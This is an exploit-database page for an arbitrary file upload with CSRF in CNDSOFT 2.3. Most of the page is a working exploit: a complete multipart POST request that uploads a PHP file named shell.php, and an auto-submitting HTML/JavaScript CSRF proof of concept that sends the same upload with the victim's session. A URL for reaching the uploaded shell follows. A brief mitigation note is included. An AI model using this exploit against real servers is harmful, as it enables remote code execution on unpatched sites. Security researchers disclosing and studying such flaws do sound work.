header-logo
Suggest Exploit
vendor:
CNDSOFT 2.3
by:
Besim
7,5
CVSS
HIGH
Arbitrary File Upload with CSRF
434
CWE
Product Name: CNDSOFT 2.3
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: NO
Related CWE: N/A
CPE: 2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

CNDSOFT 2.3 – Arbitrary File Upload with CSRF (shell.php)

CNDSOFT 2.3 is vulnerable to an arbitrary file upload with CSRF. An attacker can upload a malicious file such as a PHP shell to the vulnerable server. The malicious file can be uploaded by sending a POST request to the vulnerable URL with the malicious file as a parameter. The malicious file can then be accessed by an attacker to execute arbitrary commands on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is properly configured to only allow the upload of files with the correct MIME type and to ensure that the application is configured to only allow the upload of files with the correct extension.
Source

Exploit-DB raw data:

*=========================================================================================================
# Exploit Title:  CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
*=========================================================================================================


Vulnerable URL and Parameter
========================================

Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla

Vulnerable Parameter = &mesaj_baslik


TECHNICAL DETAILS & POC & POST DATA
========================================

POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
——
Content-Type: multipart/form-data;
boundary=---------------------------5035863528338
Content-Length: 1037

-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"

✓
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"

CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"
m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------5035863528338
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
Content-Type: application/octet-stream
*<?php
	phpinfo();

 ?>*
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"

5200
-----------------------------5035863528338--


*CSRF PoC - File Upload (Shell.php)*

========================================

<html>
  <!-- CSRF PoC -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "
http://site_name/ofis/index.php?is=kullanici_tanimla", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
        xhr.withCredentials = true;
        var body = "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"utf8\"\r\n" +
          "\r\n" +
          "\xe2\x9c\x93\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
+
          "\r\n" +
          "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
+
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
          "\r\n" +
          "m@yop.com\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
          "\r\n" +
          "30000\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\x3c?php \r\n" +
          "\tphpinfo();\r\n" +
          "\r\n" +
          " ?\x3e\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
          "\r\n" +
          "5200\r\n" +
          "-----------------------------5035863528338--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

========================================

*Access File : *http://www.site_name/path/personel_resimleri/shell.php


RISK
========================================

Attacker can arbitrary file upload.


--

Besim ALTINOK

Navigation

Suggest Exploit

Services By CQR